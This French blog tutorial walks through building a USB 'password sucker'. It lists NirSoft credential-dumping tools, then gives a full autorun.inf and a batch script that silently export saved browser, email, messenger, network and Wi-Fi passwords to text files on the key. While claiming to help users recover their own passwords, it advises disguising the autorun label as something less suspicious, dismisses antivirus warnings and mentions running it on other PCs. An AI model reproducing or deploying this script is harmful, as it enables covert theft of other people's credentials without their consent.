Tutoriels

[Tuto] Fabriquez un aspirateur à mots de passe.

Aujourd’hui, je vais vous apprendre à fabriquer votre propre RootKit. Plus communément appelé aspirateur à mot de passe, le rootkit est très pratique quand vous ne savez pas retrouver vos mots de passes enregistrés sur votre ordinateur.

Dans un premier temps, télécharger les fichiers que vous trouverez aux liens suivants :

Lien de téléchargement : http://www.nirsoft.net/utils/chromepass.html
Lien de téléchargement : http://www.nirsoft.net/utils/internet_explorer_password.html
Lien de téléchargement : http://www.nirsoft.net/utils/mailpv.html
Lien de téléchargement : http://www.nirsoft.net/utils/mspass.html
Lien de téléchargement : http://www.nirsoft.net/utils/network_password_recovery.html
Lien de téléchargement : http://www.nirsoft.net/utils/pspv.html
Lien de téléchargement : http://www.nirsoft.net/utils/wireless_key.html
Lien de téléchargement : http://www.nirsoft.net/utils/passwordfox.html


MessenPass: récupère les mots de passe de messageries instantanées les plus populaires : MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape 7, Trillian, Miranda, GAIM etc.

Mail PassView: récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

IE Passview: IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 7.0, ainsi que les anciennes versions d’Internet Explorer v4.0 – v6.0

Protected Storage PassView: Récupère tous les mots de passe stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer, et plus …

PasswordFox: PasswordFox est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe stockés dans votre profil actuel, mais vous pouvez facilement choisir de regarder les mots de passe de tout autre profil Firefox. Pour chaque mot de passe d’entrée, l’information suivante est affichée: Record Index, site web, nom d’utilisateur, mot de passe.

Network Password Recovery : Lorsque vous vous connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.

ChromePass : ChromePass est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et l’heure de création.

WirelessKeyView : WirelessKeyView récupère toutes les clés de réseau sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur par le service ‘Wireless Zero Configuration’ de Windows XP et par le service ‘WLAN AutoConfig’ de Windows Vista.
il est possible que votre antivirus les détecte mais ne vous inquiétez pas, ils ne sont pas dangereux.

Une fois que tout est téléchargé, copiez les *.exe dans votre clé usb.

Maintenant, ouvrez le bloc-note et copiez:

[autorun]

open = launch.bat

ACTION = sniff it !

Puis enregistrez le fichier sous la racine de la clé sous le nom autorun.inf

Vous pouvez changer « sniff it!  » par quelque chose de moins suspect 😉

Ouvrez le bloc note et copiez:

@echo off

start ChromePass.exe /stext ChromePass.txt

start iepv.exe /stext iepv.txt

start mailpv.exe /stext mailpv.txt

start mspass.exe /stext mspass.txt

start netpass.exe /stext netpass.txt

start PasswordFox.exe /stext PasswordFox.txt

start pspv.exe /stext pspv.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

Ensuite enregistrez ça à la racine de votre clé (avec les exécutables précédemment copiés dedans), sous le nom de launch.bat

Essayez votre clé maintenant. Insérez-là dans un ordinateur et cliquez sur « sniff it! » quand l’autorun est lancé.
Vous allez récupérer les résultats dans plusieurs fichiers textes en racine de votre clé.

n’oubliez pas de sauvegarder ces fichiers ailleurs après les avoir récupérés, car il seront écrasés si vous réessayez sur un autre pc.

Articles similaires

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Bouton retour en haut de la page